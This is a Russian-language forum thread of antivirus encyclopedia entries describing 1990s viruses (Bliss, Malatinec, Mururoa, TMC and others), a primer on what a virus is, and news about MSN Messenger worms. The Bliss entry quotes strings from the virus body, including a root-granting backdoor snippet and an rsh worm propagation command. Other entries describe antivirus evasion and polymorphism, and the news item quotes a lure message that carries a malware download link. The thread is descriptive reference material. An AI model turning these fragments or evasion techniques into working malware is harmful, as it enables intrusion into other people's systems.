А также содержат в своем теле тексты:

dedicated to rkd
/tmp/.bliss
asmlinkage int sys_umask(int mask)
mask&023000 return if(mask&023000) {current->uid = current->euid = current->suid = current->fsuid = 0; return old&023000} } bliss.%s.%d -l rsh%s%s %s 'cat>%s;chmod 777 %s;%s;rm -f %s' doing popen("%s" /.rhosts r %s %s .rhosts: %s, %s localhost doing do_worm_stuff() /etc /hosts.equiv hosts.equiv: %s HOME --bliss- uninfect-files-please disinfect-files-please
version %d.%d.%d (%.8x)
Compiled on Sep 28 1996 at 22:24:03
Written by electric eel.
dont-run-original
just-run-bliss
dont-run-virus
dont-run-bliss
just-run-original
exec
infect-file unsupported version
help help? hah! read the source!
/proc/loadavg %d.
loadav is %d
bliss was run %d sex ago, rep_wait=%d
/tmp/.bliss-tmp.%d execv /bin
PATH : /usr/spool/news /var/spool/news wow

Malatinec.2396
Неопасный резидентный шифрованный вирус. Не заражает файлы, имена которых начинаются на COMMAND,ADINF,AVG,AVP,CLEAN,DRWEB,F-,FINDVIRU,FV, GUARD,IBMAVSP,IV,NAV,NOD. Удаляет файлы ANTI-VIR.DAT, AVG.GRS, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, CHKLIST.TAV, FINGERP.VVF, FSIZES.QCV, IVB.NTZ, NAV_._NO,SMARTCHK.CPS,_CHK.CHK. Содержит текст:

Virus Malatinec v.0.ыН|Щreated by Aladiah Greet: all my friends in Slovakia; G722,E10,H723,H118 & all H4?? (sch.yr.95/96) & of coz i send a big fuck 2 big boxer V.M. Note: this is last evolutionary (с) version. Don't Worry! Watch out for M.1.0 (available soon:) Msg4Trnka: correct IDstr 4 Malat03=FCBF%2B9...
Mururoa.2464, 3443
Неопасные резидентные шифрованные вирусы. Mururoa.2464 4 числа выводит текст:

I have one mesage to all people on earth :
Stop all French nuclear testing in the PACIFIC
Dont forgot :Comon people dont like nuc. tests!
This is is a MURUROA 1.386 by Blesk
PLUTONIUM IS BETTER IN POWER-PLANT !!!!
My greet to VYVOJAR,SVL,METABOLIS and all IRC.

Mururoa.3443 4, 8 и 14 мая выводит на экран текст:

I have one mesage to all people on earth : All French nuc. test`s was STOPED. But MURUROA
IS DEAD !!!!! I am a coder of HELL FIRE and I
BRING YOU >>>>>> FIRE <<<<<< By Blesk/SVL
NOTE: Name of this virus is [MURUROA_END]
By Blesk from Slovak Virus Laboratories at .SK
Real name of BOZA is BIZATCH.. STUPID A-VERS !!!
PLUTONIUM IS BETTER IN POWER-PLANT !!!!
My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR And to some my friends: DJ.Milan,DJ.Maros,
DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa,
Stano ...and more... A zdravim Mira Trnku 8))

Не заражают программы, начинающиеся на: avg,fv386,turbo,fv86,guard, toolkit, scan, virlab,vir,asta,vc,sswap,debug,td,stacker,alik,rex,msav, cpav,nod,clean,f-pro,tbav,tbdriver,tbclean,tbscan,avast,nav,vshie,dizz, command, vsafe. Mururoa.3443 содержит тексты: "I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8<","For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? RADAR v PC Revue 9/94".
Pande.1520
Неопасный резидентный стелс-вирус. По возможности устанавливает свою резидентную копию в область UMB. При запуске программ из списка (по 2 буквы на имя) F-TBARRALHPKCH отключает свои стелс-процедуры. Содержит тексты "pandemonium by retch", "17/04/96".
Tmc.4829
Неопасный резидентный полиморфный вирус. Использует довольно интересный полиморфный механизм. При старте инфицированной программы, вирус получает управление и производит создание в памяти своей новой копии. Вирус хранит в своем теле таблицы по которым по определенным законам строит свой код. При построении этого кода вирус может внедрить в любое место кода (вместо очередной инструкции) команду перехода (E9 ?? ??) в свободное (не занятое еще "рабочими" инструкциями) место и продолжить построение своего кода с этого места.Вирус строит таблицы "уже занятых" областей и "настраиваемых" адресов для корректного создания своего потомка. Также он способен варьировать безусловными переходами (например, замена JE на JNE) в некоторых ситуациях. Затем вирус расшифровывает свой код, который также не является постоянным и устанавливает в память "на INT 21h" свою резидентную копию. Причем обработчик INT 21h также является непостоянным и имеет различные смещения. Далее эта резидентная копия заражает файлы только этим кодом. Для текущего сеанса работы (до следущей установки в память) все копии вируса при заражении файлов будут одинаковы. Вирус содержит текст:

TMC 1.0 by Ender from Slovakia
Welcome to the Tiny Mutation Compiler!
Dis is level 42.
Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel
Personal greetings: K. K., Dark Punisher
Win.Winsurf.1171, 1432
Неопасные резидентные вирусы, заражающие файлы в формате NewExe (NE). При запуске инфицированной программы, вирусы проверяют наличие DPMI и присутствие своих копий в памяти компьютера. Если резидентные копии вирусов не установлены и DPMI-интерфейс существует,то вирусы производят поиск строки "windir=" в своем окружении (environment), открывают файл SYSTEM.INI в каталоге, указанном в переменной "windir=", ищут в данном файле строку "shell=" и производят заражение файла,следующего за данной строкой. Обычно строка "shell=" для MS-Windows 3.xx указывает на файл PROGMAN.EXE (Program Manager). Данная программа является резидентной в течение всего сеанса работы MS-Windows. Т.о., вирус,внедренный в данную программу, также будет являться резидентным. Вирусы с помощью DPMI "перехватывают" INT 21h, "контролируют" запуск программ (Exec f.4bh Int 21h) и заражают NewExe-файлы.
WpcBats.3072
Неопасный резидентный шифрованный вирус. При нажатии на клавишу "F1" вирус выводит на экран текст:
ALA-EH
------ A.R.Jr W P C B A T S -------

Также может вывести надпись "ALA-EH" в графическом режиме монитора.

0

27

Что такое вирус

Компьютерный вирус - это специально написанная, небольшая по размерам программа (т.е. некоторая совокупность выполняемого кода), которая может "приписывать" себя к другим программам ("заражать" их), создавать свои копии и внедрять их в файлы, системные области компьютера и т.д., а также выполнять различные нежелательные действия на компьютере.

Программа, внутри которой находится вирус, называется "зараженной". Когда такая программа начинает работу, то сначала управление получает вирус. Вирус находит и "заражает" другие программы, а также выполняет какие-нибудь вредные действия (например, портит файлы или таблицу размещения файлов на диске, "засоряет" оперативную память и т.д.). Для маскировки вируса действия по заражению других программ и нанесению вреда могут выполняться не всегда, а, скажем, при выполнении определенных условий.

Например, вирус Anti-MIT ежегодно 1 декабря разрушает всю информацию на жестком диске, вирус Tea Time мешает вводить информацию с клавиатуры с 15:10 до 15:13, а знаменитый One Half, в течение всего прошлого года «гулявший» и по нашему городу, незаметно шифрует данные на жестком диске. В 1989 году американский студент сумел создать вирус, который вывел из строя около 6000 компьютеров Министерства обороны США. Эпидемия известного вируса Dir-II разразилась в 1991 году. Вирус использовал действительно оригинальную, принципиально новую технологию и на первых порах сумел широко распространиться за счет несовершенства традиционных антивирусных средств. Кристоферу Пайну удалось создать вирусы Pathogen и Queeq, а также вирус Smeg. Именно последний был самым опасным, его можно было накладывать на первые два вируса, и из-за этого после каждого прогона программы они меняли конфигурацию. Поэтому их было невозможно уничтожить. Чтобы распространить вирусы, Пайн скопировал компьютерные игры и программы, заразил их, а затем отправил обратно в сеть. Пользователи загружали в свои компьютеры зараженные программы и инфицировали диски. Ситуация усугубилась тем, что Пайн умудрился занести вирусы и в программу, которая с ними борется. Запустив ее, пользователи вместо уничтожения вирусов получали еще один. В результате этого были уничтожены файлы множества фирм, убытки составили миллионы фунтов стерлингов.

Широкую известность получил американский программист Моррис. Он известен как создатель вируса, который в ноябре 1988 года заразил порядка 7 тысяч персональных компьютеров, подключенных к Internet.

Отредактировано GRANDDUKE (2006-12-07 05:26:35)

0

28

Новый червь атакует MSN Messenger

Пользователи MSN Messenger снова под прицелом. На этот раз по сети распространяется червь под названием W32/Bropia-A. Вредоносный модуль "сидит" в файлах с расширением PIF. Как только пользователь скачивает этот файл и запускает его, недоброжелатель получает в свои руки рычаги управления удаленным компьютером через Internet Relay Chat. Потенциально Троян может использоваться как кейлоггер, для пересылки спама, для утечки информации. Подобная атака уже была произведена на пользователей MSN Messenger в октябре 2004 и в январе 2005г. Тогда червь под названием Funner, оставлял на зараженном компьютере ссылки на порнографические и игровые сайты.

0

29

Троян, распространяющийся через MSN Messenger и ворующий игровые пароли

Антивирусная компания Sophos сообщила об обнаружении нового трояна, распространяющегося в сети мгновенных сообщений MSN Messenger. Червь известен под несколькими названиями: W32/Rodok-A, BR2002, W32.HLLW.Henpeck и W32/Fleming.worm. Заразив компьютер, он рассылает по всем адресам из списка контактов MSN Messenger сообщение с просьбой протестировать некую программу со ссылкой на нее. В оригинале сообщение выглядит следующим образом:

"Hey!! Could you please check out this program for me? :) I made it myself and want people to test it. Its a readme with the program that explains what it does! http://home.no.net/downlad/BR2002.exe <-- There you can download it! give me advices on what to upgrade please!!"

Если скачать указанную программу и запустить ее, червь попытается загрузить из интернета Troj/Brat, открывающий в пораженной системе черный ход для хакера. После этого червь выводит на экран интерфейс генератора ключей к компакт-дискам с программным обеспечением. На самом деле этот генератор не умеет создавать ключи. Напротив, W32/Rodok-A пытается похитить ключи к дискам с играми Half-Life и CounterStrike.

Пока Sophos не зарегистрировала ни одного случая заражения W32/Rodok-A, однако пользователям MSN Messenger стоит быть начеку и не загружать из интернета неизвестные файлы.

0

30

Watch this video to find out more about spyware—what it is, ways your computer can become infected, symptoms of infection, and the top three things you can do to prevent spyware.  

http://www.microsoft.com/library/media/1033/athome/security/images/videos/promo_spyware.jpg

0


Вы здесь » -= NIBIRU =- » Computer Protection - ЗАЩИТА КОМПЬЮТЕРА » Viruses - ВИРУСЫ